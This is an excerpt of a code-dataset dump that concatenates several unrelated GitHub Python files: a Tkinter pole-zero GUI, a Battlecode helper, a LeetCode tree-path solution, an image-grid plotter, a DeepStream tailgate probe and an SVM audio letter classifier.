div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div=int(rem1+1)*pow(10,f-1)\r\n t=t+scale\r\n \r\n mag1=0\r\n t=0\r\n n=0\r\n while(t=1) :\r\n remul= remul/ 10\r\n ful=ful+1;\r\n if(UL <1):\r\n rem1ul = UL\r\n ful=0\r\n while(rem1ul<=1):\r\n rem1ul=rem1ul*10;\r\n ful=ful-1;\r\n UL= pow(10,(ful+1))\r\n\r\n while(nvmagmax) :\r\n magmax=abs(mag1)\r\n rem=magmax\r\n f=-1\r\n while(rem>=10) :\r\n rem= rem/ 10\r\n f=f+1;\r\n div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div=int(rem1+1)*pow(10,f-1)\r\n t=t+scale\r\n \r\n mag1=0\r\n t=0\r\n n=0\r\n while(t10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,event.x,event.y))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef zeroes(event) :\r\n global but\r\n but.config(state='active')\r\n global k\r\n global h\r\n global t\r\n global p\r\n global zcount\r\n if(h in rnum and t in inum) :\r\n messagebox.showerror(\"ERROR\", \"MULTIPLE ORDERS ARE NOT PERMITTED\" )\r\n else :\r\n if(p<10) :\r\n if(t==0) :\r\n zcount=zcount+1;\r\n rnum.append(h)\r\n inum.append(t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n gat2= canvas.create_text(478,70+25*(zcount),text=\"\",anchor=\"nw\")\r\n canvas.itemconfigure(gat2,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n gat3= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(gat3,text=\"o\")\r\n k=k+1\r\n else :\r\n zcount=zcount+1;\r\n rnum.append(h)\r\n inum.append(t)\r\n rnum.append(h)\r\n inum.append(-1*t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n Wn=math.sqrt(pow(h,2) + pow(t,2))\r\n delta = h/ Wn\r\n sc.append(Wn*(1 - 2*pow(delta,2)+ math.sqrt( 2- 4*pow(delta,2) + 4*pow(delta,4))))\r\n gat= canvas.create_text(478,70+25*zcount,text=\"\",anchor=\"nw\")\r\n gat1= canvas.create_text(578,70+25*zcount,text=\"\",anchor=\"nw\")\r\n gat5= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(gat5,text=\"o\")\r\n gat4= canvas.create_text(((10+h)*20+50),(450-(10-t)*20),text=\"\")\r\n canvas.itemconfigure(gat4,text=\"o\")\r\n canvas.itemconfigure(gat,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n canvas.itemconfigure(gat1,text=\"%.2f\"%h + \" + \" + \"%.2f\"%(-1*t) + \" i\")\r\n k=k+2\r\n \r\n\r\ndef poles(event) :\r\n global but\r\n but.config(state='active')\r\n global l\r\n global h\r\n global t\r\n global p\r\n global q\r\n global pcount\r\n if(h in rden and t in iden) :\r\n messagebox.showerror(\"ERROR\", \"REPEATED POLES AND ZEROES ARE NOT PERMITTED\" )\r\n else:\r\n if(p<10) :\r\n if(t==0) :\r\n pcount=pcount+1;\r\n rden.append(h)\r\n iden.append(t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n cat2= canvas.create_text(700,70+25*pcount,text=\"\",anchor=\"nw\")\r\n canvas.itemconfigure(cat2,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n cat3= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(cat3,text=\"x\")\r\n l=l+1\r\n else :\r\n pcount=pcount+1;\r\n rden.append(h)\r\n iden.append(t)\r\n rden.append(h)\r\n iden.append(-1*t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n Wn=math.sqrt(pow(h,2) + pow(t,2))\r\n delta = h/ Wn\r\n sc.append(Wn*(1 - 2*pow(delta,2)+ math.sqrt( 2- 4*pow(delta,2) + 4*pow(delta,4))))\r\n cat= canvas.create_text(700,70+25*pcount,text=\"\",anchor=\"nw\")\r\n cat1= canvas.create_text(800,70+25*pcount,text=\"\",anchor=\"nw\")\r\n cat5= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(cat5,text=\"x\")\r\n cat4= canvas.create_text(((10+h)*20+50),(450-(10-t)*20),text=\"\")\r\n canvas.itemconfigure(cat4,text=\"x\")\r\n canvas.itemconfigure(cat,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n canvas.itemconfigure(cat1,text=\"%.2f\"%h + \" + \" + \"%.2f\"%(-1*t) + \" i\")\r\n l= l+2\r\n\r\ndef up(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n p= p+0.1\r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n \r\n if(p>10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef down(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n p= p-0.1\r\n if(p<0) :\r\n p=0\r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef left(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n q= q + 1 \r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n if(p>10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef right(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n q= q - 1 \r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n if(p>10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\n\r\ndef done() :\r\n\r\n canvas.unbind('')\r\n canvas.unbind('')\r\n canvas.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('') \r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250,250,250,250))\r\n canvas.coords(lin,(250,250,250,250))\r\n menubar.entryconfig(\"Frequency Response\",state='normal')\r\n menubar.entryconfig(\"Time Response\",state='normal')\r\n but1.config(state='normal')\r\n but.config(state='disabled')\r\n if(k>=l):\r\n messagebox.showerror(\"ERROR\", \"THE NUMBER OF POLES MUST BE MORE THAN THE NUMBER OF ZEROES. PLEASE EDIT THE ENTRY\" )\r\n addpz()\r\n \r\n\r\ndef addpz():\r\n canvas.bind('',motion)\r\n canvas.bind('',poles)\r\n canvas.bind('',zeroes)\r\n root.bind('',poles)\r\n root.bind('',zeroes)\r\n root.bind('',up)\r\n root.bind('',down)\r\n root.bind('',right)\r\n root.bind('',left) \r\n menubar.entryconfig(\"Frequency Response\",state='disabled')\r\n menubar.entryconfig(\"Time Response\",state='disabled')\r\n but1.config(state='disabled')\r\n but.config(state='normal')\r\nroot.title('GUI SYSTEM RESPONSE PACKAGE ')\r\ncanvas = Canvas(root,width=900,height=500,bg='#eee8aa')\r\n\r\ntag= canvas.create_text(10,10,text=\"\",anchor=\"nw\")\r\ncanvas.pack()\r\n\r\ncanvas.create_line(470,0,470,500,width=2,fill='white')\r\ncanvas.create_line(50,250,450,250,width=2)\r\ncanvas.create_line(250,450,250,50,width=2)\r\ncanvas.create_text(550,60,text=\"ZEROES\")\r\ncanvas.create_text(780,60,text=\"POLES\")\r\ncanvas.create_text(680,20,text=\"Use SHIFT/RIGHT CLICK for entry of zeroes \\n and ENTER/LEFT CLICK for entry of poles\")\r\ncanvas.create_text(250,480,text=\"Use UP and DOWN arrow keys for magnitude adjustments \\n and LEFT and RIGHT arrow keys for angle adjustments\")\r\noval=canvas.create_oval(250,250,250,250,width=1)\r\nlin=canvas.create_line(250,250,250,250)\r\n\r\n\r\ncanvas.bind('',motion)\r\ncanvas.bind('',poles)\r\ncanvas.bind('',zeroes)\r\nroot.bind('',poles)\r\nroot.bind('',zeroes)\r\nroot.bind('',up)\r\nroot.bind('',down)\r\nroot.bind('',right)\r\nroot.bind('',left)\r\n \r\n\r\n\r\n\r\nfor i in range(21):\r\n x= 50 + (i*20)\r\n canvas.create_line(x,250,x,245,width=2)\r\n canvas.create_text(x,254,text='%d'%(i-10),anchor=N)\r\nfor j in range(21):\r\n y= 450 - (j*20)\r\n canvas.create_line(250,y,255,y,width=2)\r\n canvas.create_text(245,y,text='%d'%(j-10),anchor=E)\r\nx=0;\r\ny=0;\r\n\r\nl1= Label(root,text='GAIN')\r\nl1.pack(side='left')\r\nz1=Entry(root)\r\nz1.pack(side='left')\r\nz1.insert(3,'1')\r\n\r\ngain=float(z1.get())\r\nbut=Button(root,text='DONE',command=done,state='disabled')\r\nbut.pack(side=RIGHT)\r\nbut1=Button(root,text='ADD POLES AND ZEROES ',state='disabled',command=addpz)\r\nbut1.pack(side=BOTTOM)\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"NiveditaSuresh/GUI-based-TFAP","sub_path":"TFAP.py","file_name":"TFAP.py","file_ext":"py","file_size_in_byte":33172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42121476533","text":"import battlecode as bc\nimport random\nimport sys\nimport traceback\nimport time\n\nimport os\nprint(os.getcwd())\n\n# A GameController is the main type that you talk to the game with.\n# Its constructor will connect to a running game.\nop = bc.OrbitPattern()\ndirections = list(bc.Direction)\n\nprint(\"pystarted\")\n\n# It's a good idea to try to keep your bots deterministic, to make debugging easier.\n# determinism isn't required, but it means that the same things will happen in every thing you run,\n# aside from turns taking slightly different amounts of time due to noise.\nrandom.seed(6137)\n\n# let's start off with some research!\n# we can queue as much as we want.\n\nmy_team = gc.team()\nearth_flood_round = 750\n\nclass RocketLaunch(object):\n\t\n\tdef __init__(self):\n\t\tarrival_time = [i for i in range(earth_flood_round)]\n\t\tfor current_round in range(1, earth_flood_round):\n\t\t\tarrival_time[i] += op.duration(i)\n\t\t\n\t\tbest_launch_time = [i for i in range(earth_flood_round)]\n\t\tfor current_round in range(earth_flood_round-2, 0, -1):\n\t\t\tif arrival_time[best_launch_time[current_round+1]] < arrival_time[current_round]:\n\t\t\t\tbest_launch_time[current_round] = best_launch_time[current_round+1]\n\t\t\telse:\n\t\t\t\tbest_launch_time[current_round] = current_round\n\t\t\t\t\n\tdef get_launch_time(self, round):\n\t\treturn best_launch_time(round)\n","repo_name":"AnPelec/Battlecode-2018","sub_path":"Miscellaneous/rocket_launch_time.py","file_name":"rocket_launch_time.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18494905109","text":"# -*- coding:utf-8 -*-\nfrom collections import deque\nclass Solution:\n def binaryTreePaths(self, root):\n if root is None: return []\n queue = deque([root, str(root.val)])\n ans = []\n while queue:\n top, path = queue.popleft()\n if top.left is None and top.right is None:\n ans += path\n continue\n if top.left:\n queue += [top.left, path + \"->\" + str(top.left.val)]\n if top.right:\n queue += [top.right, path + \"->\" + str(top.right.val)]\n return ans\n\n# class Solution:\n# # @param {TreeNode} root the root of the binary tree\n# # @return {List[str]} all root-to-leaf paths\n# def dfs(self, node, result, tmp):\n# tmp.append(str(node.val))\n# if node.left is None and node.right is None:\n# result.append('->'.join(tmp))\n# tmp.pop()\n# return\n# if node.left:\n# self.dfs(node.left, result, tmp)\n# if node.right:\n# self.dfs(node.right, result, tmp)\n# tmp.pop()\n#\n# def binaryTreePaths(self, root):\n# result = []\n# if root is None: return result\n# self.dfs(root, result, [])\n# return result","repo_name":"sunxianfeng/LeetCode-and-python","sub_path":"leetcode with python/binaryTreePaths.py","file_name":"binaryTreePaths.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5105196139","text":"\nimport numpy as np\nimport gv\n#from scipy.ndimage.interpolation import zoom\n\nclass ImageGrid(object):\n def __init__(self, rows, cols, size, border_color=np.array([0.5, 0.5, 0.5]), nan_color=np.array([1.0, 1.0, 1.0])):\n self._rows = rows\n self._cols = cols\n self._size = size\n self._border = 1\n self._border_color = np.array(border_color)\n self._nan_color = np.array(nan_color)\n\n self._fullsize = (self._border + (size[0] + self._border) * self._rows,\n self._border + (size[1] + self._border) * self._cols)\n\n self._data = np.ones(self._fullsize + (3,), dtype=np.float64)\n\n @property\n def image(self):\n return self._data\n\n def set_image(self, image, row, col, vmin=None, vmax=None, cmap=None):\n import matplotlib as mpl\n import matplotlib.pylab as plt\n\n if cmap is None:\n cmap = plt.cm.gray\n if vmin is None:\n vmin = image.min()\n if vmax is None:\n vmax = image.max()\n\n from gv.fast import resample_and_arrange_image\n\n if vmin == vmax:\n diff = 1\n else:\n diff = vmax - vmin\n \n image_indices = (np.clip((image - vmin) / diff, 0, 1) * 255).astype(np.uint8)\n\n rgb = resample_and_arrange_image(image_indices, self._size, mpl.colors.makeMappingArray(256, cmap))\n\n self._data[row * (self._size[0] + self._border) : (row + 1) * (self._size[0] + self._border) + self._border,\n col * (self._size[1] + self._border) : (col + 1) * (self._size[1] + self._border) + self._border] = self._border_color \n\n anchor = (self._border + row * (self._size[0] + self._border),\n self._border + col * (self._size[1] + self._border))\n\n not_valid = np.isnan(image)[...,np.newaxis]\n\n self._data[anchor[0] : anchor[0] + rgb.shape[0],\n anchor[1] : anchor[1] + rgb.shape[1]] = rgb * (1 - not_valid) + self._nan_color * not_valid\n\n def save(self, path, scale=1):\n data = self._data\n if scale != 1:\n from skimage.transform import resize\n data = resize(self._data, tuple([self._data.shape[i] * scale for i in range(2)]), order=0)\n gv.img.save_image(path, data)\n","repo_name":"gustavla/vision-research","sub_path":"gv/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43960336247","text":"# 4.3\n# Define the Probe Function\ndef osd_sink_pad_buffer_probe(pad, info, u_data):\n gst_buffer=info.get_buffer()\n\n # Retrieve batch metadata from the gst_buffer\n batch_meta=pyds.gst_buffer_get_nvds_batch_meta(hash(gst_buffer))\n l_frame=batch_meta.frame_meta_list\n while l_frame is not None:\n \n # Initially set the tailgate indicator to False for each frame\n tailgate=False\n try:\n frame_meta=pyds.NvDsFrameMeta.cast(l_frame.data)\n except StopIteration:\n break\n frame_number=frame_meta.frame_num\n l_obj=frame_meta.obj_meta_list\n \n # Iterate through each object to check its dimension\n while l_obj is not None:\n try:\n obj_meta=pyds.NvDsObjectMeta.cast(l_obj.data)\n \n # If the object meet the criteria then set tailgate indicator to True\n obj_bottom=obj_meta.rect_params.top+obj_meta.rect_params.height\n if (obj_meta.rect_params.width > FRAME_WIDTH*.3) & (obj_bottom > FRAME_HEIGHT*.9): \n tailgate=True\n \n except StopIteration:\n break\n try: \n l_obj=l_obj.next\n except StopIteration:\n break\n \n display_meta=pyds.nvds_acquire_display_meta_from_pool(batch_meta)\n display_meta.num_labels = 1\n py_nvosd_text_params = display_meta.text_params[0]\n # Setting display text to be shown on screen\n # Note that the pyds module allocates a buffer for the string, and the\n # memory will not be claimed by the garbage collector.\n # Reading the display_text field here will return the C address of the\n # allocated string. Use pyds.get_string() to get the string content.\n py_nvosd_text_params.display_text = \"Frame Number={} Tailgate={}\".format(frame_number, tailgate)\n\n # Now set the offsets where the string should appear\n py_nvosd_text_params.x_offset = 10\n py_nvosd_text_params.y_offset = 12\n\n # Font , font-color and font-size\n py_nvosd_text_params.font_params.font_name = \"Serif\"\n py_nvosd_text_params.font_params.font_size = 36\n # set(red, green, blue, alpha); set to White\n py_nvosd_text_params.font_params.font_color.set(1.0, 1.0, 1.0, 1.0)\n\n # Text background color\n py_nvosd_text_params.set_bg_clr = 1\n # set(red, green, blue, alpha); set to Black\n py_nvosd_text_params.text_bg_clr.set(0.0, 0.0, 0.0, 1.0)\n # Using pyds.get_string() to get display_text as string\n print(pyds.get_string(py_nvosd_text_params.display_text))\n pyds.nvds_add_display_meta_to_frame(frame_meta, display_meta)\n print(f'Analyzing frame {frame_number}', end='\\r')\n inference_output.append(str(int(tailgate)))\n try:\n l_frame=l_frame.next\n except StopIteration:\n break\n return Gst.PadProbeReturn.OK","repo_name":"rajeshroy402/tailgate-code","sub_path":"nvosd_probe.py","file_name":"nvosd_probe.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25111137711","text":"import sys\nimport warnings\nimport random\n\nif not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\nimport os\nfrom string import ascii_uppercase\nfrom python_speech_features import mfcc\nfrom python_speech_features import delta\nfrom python_speech_features import logfbank\nimport scipy.io.wavfile as wav\nimport scipy.interpolate as interpol\nimport glob\nimport wave\nimport pickle\nimport sklearn\nimport scipy.io.wavfile as wav\n\nimport numpy as np\nfrom time import time\nfrom sklearn.metrics import classification_report\n\nimport joblib\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport subprocess\n\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import accuracy_score\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import average_precision_score\nfrom scipy import signal\nimport itertools\nfrom subprocess import Popen\n\ngnuplot_exe = r\"C:\\Program Files (x86)\\gnuplot\\bin\\gnuplot.exe\"\ngrid_py = r\"C:\\Users\\bruce\\Documents\\Personal-projects\\backup\\gpu\\tools\\grid.py\"\nsvmtrain_exe = (\n r\"C:\\Users\\bruce\\Documents\\Personal-projects\\backup\\gpu\\windows\\svm-train-gpu.exe\"\n)\nsvmpredict_exe = (\n r\"C:\\Users\\bruce\\Documents\\Personal-projects\\backup\\gpu\\windows\\svm-predict.exe\"\n)\ncrange = \"-5,13,2\" # \"1,5,2\"\ngrange = \"-15,-8,2\" # \"-3,2,2\"\n\n\ndef paramsfromexternalgridsearch(filename, crange, grange, printlines=False):\n # printlines specifies whether or not the function should print every line of the grid search verbosely\n cmd = 'python \"{0}\" -log2c {1} -log2g {2} -svmtrain \"{3}\" -gnuplot \"{4}\" -png grid.png \"{5}\"'.format(\n grid_py, crange, grange, svmtrain_exe, gnuplot_exe, filename\n )\n f = Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout\n\n line = \"\"\n while True:\n last_line = line\n line = f.readline()\n if not line:\n break\n if printlines:\n print(line)\n c, g, rate = map(float, last_line.split())\n return c, g, rate\n\n\ndef accuracyfromexternalpredict(\n scaled_test_file, model_file, predict_test_file, predict_output_file\n):\n cmd = '\"{0}\" \"{1}\" \"{2}\" \"{3}\"'.format(\n svmpredict_exe, scaled_test_file, model_file, predict_test_file\n )\n f = Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout\n # f = subprocess.Popen(cmd, shell = True, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)\n\n line = \"\"\n while True:\n last_line = line\n line = f.readline()\n if not line:\n break\n\n return (\n last_line.split(\" \")[3][1:-1].split(\"/\")[0],\n last_line.split(\" \")[3][1:-1].split(\"/\")[1],\n )\n\n\ndef normalize(inSig, outLen):\n # This function normalizes the audio signal.\n # It first produces an interp1d structure that readily interpolates between points\n # Then it sets the size of the space to outLen=200000 points, and interp1d interpolates to fill in gaps\n # In essence, it takes every audio signal and produces a signal with outLen=200000 data points in it = normalization\n # inSig = np.array(inSig)\n arrInterpol = interpol.interp1d(np.arange(inSig.size), inSig)\n arrOut = arrInterpol(np.linspace(0, inSig.size - 1, outLen))\n return arrOut\n\n\ndef justpadwithzeros(inSig, rate):\n # >> > a = [1, 2, 3, 4, 5]\n # >> > np.pad(a, (2, 3), 'constant', constant_values=(4, 6))\n # array([4, 4, 1, 2, 3, 4, 5, 6, 6, 6])\n # longest is 267264\n maxlength = rate * 6.1 # 6.1s long which comes to 269010 samples at this rate\n return np.pad(inSig, (0, int(maxlength - inSig.shape[0])), mode=\"constant\")\n\n\ndef writetopcklfile(outpath, data):\n with open(outpath, \"wb\") as f:\n pickle.dump(data, f)\n\n\ndef readfrompcklfile(outpath):\n with open(outpath, \"rb\") as f:\n return pickle.load(f)\n\n\ndef custom_dump_svmlight_file(X_train, Y_train, filename):\n # This function inserts the extracted features in the libsvm format\n featinds = [\" \" + str(i) + \":\" for i in range(1, len(X_train[0]) + 1)]\n with open(filename, \"w\") as f:\n for ind, row in enumerate(X_train):\n f.write(\n str(Y_train[ind])\n + \" \"\n + \"\".join(\n [\n x\n for x in itertools.chain.from_iterable(\n zip(featinds, map(str, row))\n )\n if x\n ]\n )\n + \"\\n\"\n )\n\n\ndef training(training_data, test_data, file_output_name, params):\n X_train, Y_train = training_data\n X_test, Y_test = test_data\n\n clf = svm.SVC(kernel=\"rbf\", C=params[\"C\"], gamma=params[\"gamma\"])\n clf.fit(X_train, Y_train)\n pred = clf.predict(X_test)\n print(clf.score(X_test, Y_test))\n # print(confusion_matrix(Y_test, pred))\n # print(classification_report(Y_test, pred))\n # save the classifier\n\n with open(file_output_name, \"wb\") as fid:\n pickle.dump(clf, fid)\n\n return confusion_matrix(Y_test, pred)\n\n\nmapping = {v: k for k, v in enumerate(ascii_uppercase)}\ninv_map = {v: k for k, v in mapping.items()}\n\n\ndef main():\n start = time()\n\n path = r\"data_by_subject\"\n files = os.listdir(path)\n\n features = []\n label = []\n Filenames = {}\n X = None\n Xdir = {}\n y = []\n\n y_unseen = []\n X_unseen = None\n\n from tqdm import tqdm\n\n # The upper bound for the data set samples is 2.89 seconds so later just pad every sequence with\n # zeros up to this length\n rate = 44100\n maxlength = rate * 2.82\n counter = 0\n unseen_counter = 0\n file_count = sum(len(files) for _, _, files in os.walk(path))\n\n choices = [\"Subject_1\", \"Subject_2\", \"Subject_3\", \"Subject_4\", \"Subject_5\"]\n print(choices)\n max_length = 0\n with tqdm(total=file_count) as pbar:\n for subdir, dirs, files in tqdm(os.walk(\"data_by_subject/\")):\n file_counter = 0\n print(subdir, len(files))\n for soundfile in files:\n if file_counter == 0 or file_counter == 9:\n file_counter += 1\n continue\n pbar.update(1)\n if soundfile.endswith(\".wav\"):\n (rate, sig) = wav.read(subdir + \"/\" + soundfile)\n if len(sig) / float(rate) > max_length:\n max_length = len(sig) / float(rate)\n newSig = np.array(sig)\n if rate != 44100:\n\n base2roreach = int(\n np.floor(np.log2(newSig.shape[0] / rate * 44100))\n )\n samplestoeliminate = int(\n np.ceil(\n newSig.shape[0] - ((2**base2roreach * rate) / 44100)\n )\n )\n newSig = newSig[samplestoeliminate:]\n newwidth = (\n 2**base2roreach\n ) # int(np.ceil(newSig.shape[0]/rate*44100))\n newSig = signal.resample(newSig, newwidth)\n rate = 44100\n # print(rate)\n\n # newSig = justpadwithzeros(newSig, rate)\n newSig = np.pad(\n newSig, (0, int(maxlength - newSig.shape[0])), mode=\"constant\"\n )\n\n mfcc_feat = mfcc(\n newSig, rate, nfft=2048, winfunc=np.hamming\n ).ravel()\n mfcc_feat = mfcc_feat.reshape(1, mfcc_feat.shape[0])\n # mfcc_feat = None\n\n Xdir[soundfile.replace(\".wav\", \"\")] = counter\n label = mapping[os.path.join(subdir, soundfile).split(\"\\\\\")[1]]\n\n if any(sub in subdir for sub in choices):\n if counter == 0:\n X = mfcc_feat\n else:\n X = np.vstack((X, mfcc_feat))\n pass\n y.append(label)\n counter += 1\n else:\n # print(os.path.join(subdir, soundfile))\n if unseen_counter == 0:\n X_unseen = mfcc_feat\n else:\n X_unseen = np.vstack((X_unseen, mfcc_feat))\n pass\n y_unseen.append(label)\n unseen_counter += 1\n file_counter += 1\n print(\"maxlength = \", max_length)\n # y.append(soundfile[:1])\n finish = time()\n print(\"Time to load data %.3f s\" % (finish - start))\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=30, stratify=y\n )\n # feature scaling in order to standardize the features\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n writetopcklfile(\"training_data\", [X_train, y_train])\n writetopcklfile(\"semi-seen-data\", [X_test, y_test])\n custom_dump_svmlight_file(X_train, y_train, \"new_training_data\")\n custom_dump_svmlight_file(X_test, y_test, \"semi-seen-data\")\n # custom_dump_svmlight_file(X_unseen, y_unseen, \"unseen-data\")\n \n \n scaler = StandardScaler().fit(X_unseen)\n X_unseen = scaler.transform(X_unseen)\n\n c, gamma, accuracy = paramsfromexternalgridsearch(\n \"new_training_data\",\n crange,\n grange,\n printlines=True,\n )\n print(accuracy)\n\n all_matrix = training(\n (X_train, y_train),\n (X_test, y_test),\n \"classifier_all.pkl\",\n {\"C\": c, \"gamma\": gamma},\n )\n\n df_cm = pd.DataFrame(\n all_matrix,\n index=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n columns=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n )\n plt.figure(figsize=(10, 7))\n all_map = sns.heatmap(df_cm, annot=True)\n\n fig = all_map.get_figure()\n fig.savefig(\"semi-seen.png\")\n\n model = pickle.load(open(\"classifier_all.pkl\", \"rb\"))\n y_pred = model.predict(X_unseen)\n\n print(\"Unseen accuracy score\")\n print(accuracy_score(y_unseen, y_pred))\n df_cm = pd.DataFrame(\n confusion_matrix(y_unseen, y_pred),\n index=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n columns=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n )\n plt.figure(figsize=(10, 7))\n all_map = sns.heatmap(df_cm, annot=True)\n\n fig = all_map.get_figure()\n fig.savefig(\"unseen_map.png\")\n test_words = [\n \"THE\",\n \"QUICK\",\n \"BROWN\",\n \"FOX\",\n \"JUMPED\",\n \"OVER\",\n \"LAZY\",\n \"DOG\",\n ]\n subject_1, subject_2, subject_3 = {}, {}, {}\n for w in test_words:\n word_1, word_2, word_3 = [], [], []\n for l in w:\n value = mapping[l]\n word_1.append(X_unseen[((value + 1) * 8) - 1])\n word_2.append(X_unseen[((value + 1) * 8 + 208) - 1])\n word_3.append(X_unseen[((value + 1) * 8 + 416) - 1])\n subject_1[w] = \"\".join([inv_map[j] for j in list(model.predict(word_1))])\n subject_2[w] = \"\".join([inv_map[j] for j in list(model.predict(word_2))])\n subject_3[w] = \"\".join([inv_map[j] for j in list(model.predict(word_3))])\n\n # check_words(subject_1)\n # check_words(subject_2)\n # check_words(subject_3)\n # for i in subject_1:\n # prediction =\n # print(\"\".join([inv_map[j] for j in list(prediction)]))\n # # print(spell.correction(\"\".join([inv_map[j] for j in list(model.predict(np.array(i)))])))\n # print(spell.candidates(\"\".join([inv_map[j] for j in list(prediction)])))\n # for i in subject_2:\n # prediction = model.predict(np.array(i))\n # print(\"\".join([inv_map[j] for j in list(prediction)]))\n # # print(spell.correction(\"\".join([inv_map[j] for j in list(model.predict(np.array(i)))])))\n # print(spell.candidates(\"\".join([inv_map[j] for j 